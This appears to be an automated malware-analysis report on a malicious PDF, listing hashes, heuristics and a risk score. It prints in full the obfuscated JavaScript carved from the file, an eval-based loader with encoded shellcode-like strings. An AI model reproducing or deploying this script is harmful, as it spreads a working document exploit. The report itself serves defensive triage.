Malicious PDF — malware analysis report

Static analysis result for SHA-256 51bc4fdadea397b2…

MALICIOUS

PDF

9.4 KB Created: 2010-06-17 03:57:59 Authoring application: fRkOB (via A42zW) First seen: 2026-05-10
MD5: 61a71ea8055cb2db7ae04551621edb8b SHA-1: fe273b4690e628f8bd4d1604c77d4e923afa2dd4 SHA-256: 51bc4fdadea397b203d980d4baff6798b39973dcac12c3c5fb478ae2456e22cc
166 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript with a high-confidence eval() call, indicating obfuscated code execution. The JavaScript is likely intended to download and execute a second-stage payload. The presence of obfuscation and the use of eval() suggest a malicious intent, though the specific family cannot be determined from the available evidence.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    %Jw<K(%J..vK%JKIIv%Jwt(1%J3K3w%JwOw3%Jo.KI%JKw<h%JKKIh%J(o1K%J1v<o%J<hFh%J1vFh%JwOO1%Jf(b3%JwbFh%JFhoh%J.b1v%Jb3wO%Jw1Fh%JwOFh%J1K3o%J3I13%Jw.wt%JK1<t%JK<KK%J1oK<%Job1I%Jo<o3%Jw.oK%JthFf%Jt<th%J3.bo%JFh3.%JFIb<%JbKFK%JtbFw%JF(3w%JFFFw%J3.F.%JFOF3%JFtF.%JFO3.%JFKF.%J3wFh%JFft<%Jb.t<%JFhF(%Jb(bI%J<<bt\"n;\nGGa\nGGPeTPG0QG9e.qW wRufIYXrJuJG==G3nL\nGGGG7K7twVxU{ VcH2z7G=GJWPTSruP9\"%Jhbhb%Jhbhb%Jhbhb%J<.w1%Jbbv1%JFFO(%Jf<1(%Jf<<K%Jw.bb%Jw3hb%Jw1.o%Jwf<v%J..wO%J....%Jf1t.%JI.hw%Jw.w.%JFhw.%Jwbo.%J(.F …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x245 8083 bytes
SHA-256: 2465641959e33a71d8e0c349ac89f4ddf32e6f419cebcb145f5fc5431f03d5f8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). 122 of 170 identifiers look randomly generated (e.g. 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmn') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function AgiW6DE(AgiW6DE,BKnkZxPa0q8pk) {var L7iI2ExuQCh3s4c2nmQ=AgiW6DE. substr (BKnkZxPa0q8pk, 1);return L7iI2ExuQCh3s4c2nmQ;}/*RXHvJdKL6nEIkmRdrE|AGv1yqTr|A7LNVS9evJ*/function A4zFvcX2iKk(mWC9xIeKXQmvmYXyI) {/*swu0XWH0DMEBS02|gLz0Hx|VITUn*/var MIDCNyf = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");/*eTxRDn[Zvfd7kePaXX7iMy]A0CIKXvP1FCIIqxi*//*TBZ3goU4CScP|JP7MYH|KWaPZjXFW5hq76*/var rDwRyYo1YcA3mX /*el4YoN13UBIRNh[wrvN6LwTRJO]zMvZqXUFBh6427DJKl*/= new String("8>9nLaGBEo1OIw.lm6RC5UXZ7AziMy)Nck2rjSgPQdH0VDe W4uYqT}Jx{,sp<K3bhvFtf(");/*ASVKOg7hxGwm59|VpvpuwNrrFo|PzWyxoJ73p4bdAOF6*/for(PIwnfkw=0;PIwnfkw<MIDCNyf.length;PIwnfkw++) {if(mWC9xIeKXQmvmYXyI == AgiW6DE(rDwRyYo1YcA3mX, PIwnfkw)) {/*dR3P6oBK[tPAfe02Snh]laHf1lgGqdTK*/return AgiW6DE(MIDCNyf, PIwnfkw);/*MZs1b2MLHNqlDi4qF <SgexYFUewy]AjAWR2xJE8RSp3VNx*/}}return mWC9xIeKXQmvmYXyI;}/*TKUzp[OvdsiRg]Ah1IZpSeojwTc*//*hQJ1be|Hm52FnbWJ6NrxVGd|kHNWbpd96n0XHie*/var bbj4eWmMedtCzpG4OHE = new String;var rep74fo2LOxnqWiKtK = new String("\nxrqGwZ{lpu{V(kk4yzYfG=GWP{Goqqrs9n;\nxrqGXYzdwK)V}Vhe}Y t;\nQJWS}04WGCVUwkRsHTN)U,Uyb9lxVA{w<usIjqvX,CEGACkQgcXNh}}3.XhinL\nGG{H0ePG9lxVA{w<usIjqvX,CBePWd}HG*G3G8GACkQgcXNh}}3.XhinL\nGGGGlxVA{w<usIjqvX,CG+=GlxVA{w<usIjqvX,C;\nGGa\nGGlxVA{w<usIjqvX,CG=GlxVA{w<usIjqvX,CBTJjT}q0Wd9<EGACkQgcXNh}}3.XhiG/G3n;\nGGqP}JqWGlxVA{w<usIjqvX,C;\na\nQJWS}04WG6W}.bhvKmQq5hud19e.qW wRufIYXrJuJnL\nGGxrqGzV<D wehJg7,iF(SG=G<,<S<S<S<S;\nGGxrqG7K7twVxU{ VcH2z7G=GJWPTSruP9\"%Jhbhb%Jhbhb%Jhbhb%J<.w1%Jbbv1%JFFO(%Jf<1(%Jf<<K%Jw.bb%Jw3hb%Jw1.o%Jwf<v%J..wO%J....%Jf1t.%JI.hw%Jw.w.%JFhw.%Jwbo.%J(.Fh%Jh3.b%J(.Fh%JFwwt%Jw.<b%Jw.w1%JFhw.%J1(<b%JFKft%JwKoK%J<t<b%Jw.KK%Jw.w.%JooFF%J1(w1%Jttft%JFvKK%J<twK%Jw.K.%Jw.w.%JooFF%J1(wt%JOoft%JK<v.%J<t3I%Jw.<I%Jw.w.%JooFF%J1(wb%J<<ft%J<.3K%J<tf.%Jw.b1%Jw.w.%JooFF%J1(..%J3wft%J<o(F%J<tvt%Jw.3(%Jw.w.%JooFF%Jo..1%JItF.%J(o3O%JFFKv%J.too%Jwf<F%Jw.ww%J1Kw.%J(oFF%JFhO1%Jw1oo%Jwwfv%JFh1F%J.t1o%J<t1(%Jw.Fh%Jw.w.%Jft1.%J.vI(%J(.O<%Jtf<t%Jw.w.%JFFw.%J.boo%J3oFh%J3.FO%JFF1.%JO.oo%JK<ft%Jw.w.%J1.w.%JooFh%Jfv.1%J1FwI%J1oFh%J<t.t%Jw.fw%Jw.w.%JoowO%J3fO.%J1bw.%JOK(K%J3ffo%Jw1o.%Jfo(t%Jw.w.%J(oK<%JFhO.%Jwboo%Jwwfv%JFh1F%J.t1o%Jo.<t%Jw.w.%Jfvw.%J1twf%JoowO%JIOO1%J1Obh%JK<1O%JO.(o%J1O1.%JooFh%Jfv.b%J1Fwo%J1oFh%J<t.t%Jw.OO%Jw.w.%Jw.fv%J(oK<%JFhO.%Jwtoo%JwIfv%JFh1F%J.t1o%J..<t%Jw.w.%Jfvw.%JFhK<%J..oo%Jwwfv%JFh1F%J.t1o%Jw.<t%Jw.w.%Joww.%J1I1h%J<wwO%J<wwO%J<wwO%J<wwO%J<bFO%J1vw1%JFh1O%J<Ibv%J1IKf%J<.K<%JFh1o%JFh<b%Jwt(3%J13Fh%J1(wb%J(OFh%JFhIb%J.K(1%JwO(t%J1(KO%J((Fh%JwOO.%JIOKO%JoF3F%Jh3ow%J3OwO%JIO1(%Jw<K(%J..vK%JKIIv%Jwt(1%J3K3w%JwOw3%Jo.KI%JKw<h%JKKIh%J(o1K%J1v<o%J<hFh%J1vFh%JwOO1%Jf(b3%JwbFh%JFhoh%J.b1v%Jb3wO%Jw1Fh%JwOFh%J1K3o%J3I13%Jw.wt%JK1<t%JK<KK%J1oK<%Job1I%Jo<o3%Jw.oK%JthFf%Jt<th%J3.bo%JFh3.%JFIb<%JbKFK%JtbFw%JF(3w%JFFFw%J3.F.%JFOF3%JFtF.%JFO3.%JFKF.%J3wFh%JFft<%Jb.t<%JFhF(%Jb(bI%J<<bt\"n;\nGG0QG9e.qW wRufIYXrJuJG==GKnL\nGGGGzV<D wehJg7,iF(SG=G<,b<b<b<b<;\nGGGG7K7twVxU{ VcH2z7G=GJWPTSruP9\"%Jhbhb%Jhbhb%Jhbhb%J<.w1%Jbbv1%JFFO(%Jf<1(%Jf<<K%Jw.bb%Jw3hb%Jw1.o%Jwf<v%J..wO%J....%Jf1t.%JI.hw%Jw.w.%JFhw.%Jwbo.%J(.Fh%Jh3.b%J(.Fh%JFwwt%Jw.<b%Jw.w1%JFhw.%J1(<b%JFKft%JwKoK%J<t<b%Jw.KK%Jw.w.%JooFF%J1(w1%Jttft%JFvKK%J<twK%Jw.K.%Jw.w.%JooFF%J1(wt%JOoft%JK<v.%J<t3I%Jw.<I%Jw.w.%JooFF%J1(wb%J<<ft%J<.3K%J<tf.%Jw.b1%Jw.w.%JooFF%J1(..%J3wft%J<o(F%J<tvt%Jw.3(%Jw.w.%JooFF%Jo..1%JItF.%J(o3O%JFFKv%J.too%Jwf<F%Jw.ww%J1Kw.%J(oFF%JFhO1%Jw1oo%Jwwfv%JFh1F%J.t1o%J<t1(%Jw.Fh%Jw.w.%Jft1.%J.vI(%J(.O<%Jtf<t%Jw.w.%JFFw.%J.boo%J3oFh%J3.FO%JFF1.%JO.oo%JK<ft%Jw.w.%J1.w.%JooFh%Jfv.1%J1FwI%J1oFh%J<t.t%Jw.fw%Jw.w.%JoowO%J3fO.%J1bw.%JOK(K%J3ffo%Jw1o.%Jfo(t%Jw.w.%J(oK<%JFhO.%Jwboo%Jwwfv%JFh1F%J.t1o%Jo.<t%Jw.w.%Jfvw.%J1twf%JoowO%JIOO1%J1Obh%JK<1O%JO.(o%J1O1.%JooFh%Jfv.b%J1Fwo%J1oFh%J<t.t%Jw.OO%Jw.w.%Jw.fv%J(oK<%JFhO.%Jwtoo%JwIfv%JFh1F%J.t1o%J..<t%Jw.w.%Jfvw.%JFhK<%J..oo%Jwwfv%JFh1F%J.t1o%Jw.<t%Jw.w.%Joww.%J1I1h%J<wwO%J<wwO%J<wwO%J<wwO%J<bFO%J1vw1%JFh1O%J<Ibv%J1IKf%J<.K<%JFh1o%JFh<b%Jwt(3%J13Fh%J1(wb%J(OFh%JFhIb%J.K(1%JwO(t%J1(KO%J((Fh%JwOO.%JIOKO%JoF3F%Jh3ow%J3OwO%JIO1(%Jw<K(%J..vK%JKIIv%Jwt(1%J3K3w%JwOw3%Jo.KI%JKw<h%JKKIh%J(o1K%J1v<o%J<hFh%J1vFh%JwOO1%Jf(b3%JwbFh%JFhoh%J.b1v%Jb3wO%Jw1Fh%JwOFh%J1K3o%J3I13%Jw.wt%JK1<t%JK<KK%J1oK<%Job1I%Jo<o3%Jw.oK%JthFf%Jt<th%J3.bo%JFh3.%JFIb<%JbKFK%JtbFw%JF(3w%JFFFw%J3.F.%JFOF3%JFtF.%JFO3.%JFKF.%J3wFh%JFft<%Jb.t<%JFhF(%Jb(bI%J<<bt\"n;\nGGa\nGGPeTPG0QG9e.qW wRufIYXrJuJG==G3nL\nGGGG7K7twVxU{ VcH2z7G=GJWPTSruP9\"%Jhbhb%Jhbhb%Jhbhb%J<.w1%Jbbv1%JFFO(%Jf<1(%Jf<<K%Jw.bb%Jw3hb%Jw1.o%Jwf<v%J..wO%J....%Jf1t.%JI.hw%Jw.w.%JFhw.%Jwbo.%J(.Fh%Jh3.b%J(.Fh%JFwwt%Jw.<b%Jw.w1%JFhw.%J1(<b%JFKft%JwKoK%J<t<b%Jw.KK%Jw.w.%JooFF%J1(w1%Jttft%JFvKK%J<twK%Jw.K.%Jw.w.%JooFF%J1(wt%JOoft%JK<v.%J<t3I%Jw.<I%Jw.w.%JooFF%J1(wb%J<<ft%J<.3K%J<tf.%Jw.b1%Jw.w.%JooFF%J1(..%J3wft%J<o(F%J<tvt%Jw.3(%Jw.w.%JooFF%Jo..1%JItF.%J(o3O%JFFKv%J.too%Jwf<F%Jw.ww%J1Kw.%J(oFF%JFhO1%Jw1oo%Jwwfv%JFh1F%J.t1o%J<t1(%Jw.Fh%Jw.w.%Jft1.%J.vI(%J(.O<%Jtf<t%Jw.w.%JFFw.%J.boo%J3oFh%J3.FO%JFF1.%JO.oo%JK<ft%Jw.w.%J1.w.%JooFh%Jfv.1%J1FwI%J1oFh%J<t.t%Jw.fw%Jw.w.%JoowO%J3fO.%J1bw.%JOK(K%J3ffo%Jw1o.%Jfo(t%Jw.w.%J(oK<%JFhO.%Jwboo%Jwwfv%JFh1F%J.t1o%Jo.<t%Jw.w.%Jfvw.%J1twf%JoowO%JIOO1%J1Obh%JK<1O%JO.(o%J1O1.%JooFh%Jfv.b%J1Fwo%J1oFh%J<t.t%Jw.OO%Jw.w.%Jw.fv%J(oK<%JFhO.%Jwtoo%JwIfv%JFh1F%J.t1o%J..<t%Jw.w.%Jfvw.%JFhK<%J..oo%Jwwfv%JFh1F%J.t1o%Jw.<t%Jw.w.%Joww.%J1I1h%J<wwO%J<wwO%J<wwO%J<wwO%J<bFO%J1vw1%JFh1O%J<Ibv%J1IKf%J<.K<%JFh1o%JFh<b%Jwt(3%J13Fh%J1(wb%J(OFh%JFhIb%J.K(1%JwO(t%J1(KO%J((Fh%JwOO.%JIOKO%JoF3F%Jh3ow%J3OwO%JIO1(%Jw<K(%J..vK%JKIIv%Jwt(1%J3K3w%JwOw3%Jo.KI%JKw<h%JKKIh%J(o1K%J1v<o%J<hFh%J1vFh%JwOO1%Jf(b3%JwbFh%JFhoh%J.b1v%Jb3wO%Jw1Fh%JwOFh%J1K3o%J3I13%Jw.wt%JK1<t%JK<KK%J1oK<%Job1I%Jo<o3%Jw.oK%JthFf%Jt<th%J3.bo%JFh3.%JFIb<%JbKFK%JtbFw%JF(3w%JFFFw%J3.F.%JFOF3%JFtF.%JFO3.%JFKF.%J3wFh%JFft<%Jb.t<%JFhF(%Jb(bI%J<<bt\"n;\nGGa\nGGxrqGTjovux(VkcH3SYg,G=G<,h<<<<<;\nGGxrqGzhhF pzV omMVVTbG=G7K7twVxU{ VcH2z7BePWd}HG*G3;\nGGxrqGACkQgcXNh}}3.XhiG=GTjovux(VkcH3SYg,G-G9zhhF pzV omMVVTbG+G<,bfn;\nGGxrqGlxVA{w<usIjqvX,CG=GJWPTSruP9\"%J(<(<%J(<(<\"n;\nGGlxVA{w<usIjqvX,CG=GCVUwkRsHTN)U,Uyb9lxVA{w<usIjqvX,CEGACkQgcXNh}}3.Xhin;\nGGxrqGXhtoswJc j2ZiOURG=G9zV<D wehJg7,iF(SG-G<,h<<<<<nG/GTjovux(VkcH3SYg,;\nGGQ4qG9xrqGP7Zb7u 1KvPDWc (G=G<;GP7Zb7u 1KvPDWc (G8GXhtoswJc j2ZiOUR;GP7Zb7u 1KvPDWc (G++GnL\nGGGGwZ{lpu{V(kk4yzYf[P7Zb7u 1KvPDWc (]G=GlxVA{w<usIjqvX,CG+G7K7twVxU{ VcH2z7;\nGGa\na\nQJWS}04WGw}R2(IfJudR6}Qj(9nL\nGGxrqGUp1yusQubC2Yq5piG=G<;\nGGxrqGXRbUN<mUYrPV.lTCG=GruuBx0P{Pq)PqT04WB}4i}q0Wd9n;\nGGruuBSePrqM0 PZJ}9XYzdwK)V}Vhe}Y tn;\n\nGG0QG9XRbUN<mUYrPV.lTCG8GtBKnL\nGGGG6W}.bhvKmQq5hud19<n;\nGGGGxrqGUvuvhyJF4M{du{<hG=GJWPTSruP9\"%J<S<S%J<S<S\"n;\nGGGG{H0ePG9UvuvhyJF4M{du{<hBePWd}HG8Ghh(v3nUvuvhyJF4M{du{<hG+=GUvuvhyJF4M{du{<h;\nGGGG}H0TGBS4eerji}4qPG=GO4eerjBS4eePS}w r0e6WQ49L\nGGGGGGTJjVG:G\"\"EG TdG:GUvuvhyJF4M{du{<h\nGGGGa\nGGGGn;\nGGa\n0QG9XRbUN<mUYrPV.lTCG>=G(nL\nGGGG}qsGL\n0QG9ruuBg4SBO4eerjBdP}6S4WnL\nGGGGGGGG6W}.bhvKmQq5hud193n;\nGGGGGGGGxrqGJ1A 50(O6W{kh4}RG=GJWPTSruP9\"%<(\"n;\nGGGGGGGG{H0ePG9J1A 50(O6W{kh4}RBePWd}HG8G<,h<<<nJ1A 50(O6W{kh4}RG+=GJ1A 50(O6W{kh4}R;\nGGGGGGGGJ1A 50(O6W{kh4}RG=G\"XB\"G+GJ1A 50(O6W{kh4}R;\nruuBg4SBO4eerjBdP}6S4W9J1A 50(O6W{kh4}Rn;\nGGGGGGGGUp1yusQubC2Yq5piG=GK;\nGGGGGGa\nGGGGGGPeTPGL\nGGGGGGGGUp1yusQubC2Yq5piG=GK;\nGGGGGGa\nGGGGa\nGGGGSr}SHG9PnL\nGGGGGGUp1yusQubC2Yq5piG=GK;\nGGGGa\nGGGG0QG9Up1yusQubC2Yq5piG==GKnL\nGGGGGG0QG99XRbUN<mUYrPV.lTCG>=GtBK&&GXRbUN<mUYrPV.lTCG8G(nnL\nGGGGGGGG6W}.bhvKmQq5hud19Kn;\nGGGGGGGGxrqGI0Z{I6bb s0jxTQoG=G\"K3((((((((((((((((((\";\nGGGGGGGGQ4qG97F{A4FSf}kQ{X2llG=G<;G7F{A4FSf}kQ{X2llG8G3tF;G7F{A4FSf}kQ{X2llG++GnL\nGGGGGGGGGGI0Z{I6bb s0jxTQoG+=G\"f\";\nGGGGGGGGa\nGGGGGGGGJ}0eBuq0W}Q9\"%hv<<<Q\"EGI0Z{I6bb s0jxTQon;\nGGGGGGa\nGGGGa\nGGa\na\nruuBwPON,wkVImC(<pRwG=Gw}R2(IfJudR6}Qj(;\nXYzdwK)V}Vhe}Y tG=GruuBTP}M0 PZJ}9\"ruuBwPON,wkVImC(<pRw9n\"EGK<n;\n");/*dXzHyMRvZ8jvECZo{mAmSelO}cmPAH9e*//*zlTB2Eb0oM4q|j1OkdgFEvNhXdh|dB9SnSUfXvVB*/for(NoGQewWYBdd=0;NoGQewWYBdd<rep74fo2LOxnqWiKtK.length;NoGQewWYBdd++)bbj4eWmMedtCzpG4OHE += A4zFvcX2iKk(AgiW6DE(rep74fo2LOxnqWiKtK,NoGQewWYBdd));eval(bbj4eWmMedtCzpG4OHE);/*Qsj0jxaCUfHFtocMM6pO[A1OSWmDsoB9Wlz6YP9t]GyevRq8NWMJVEYobB*/

Open this report in the interactive analyzer, or submit your own file for analysis.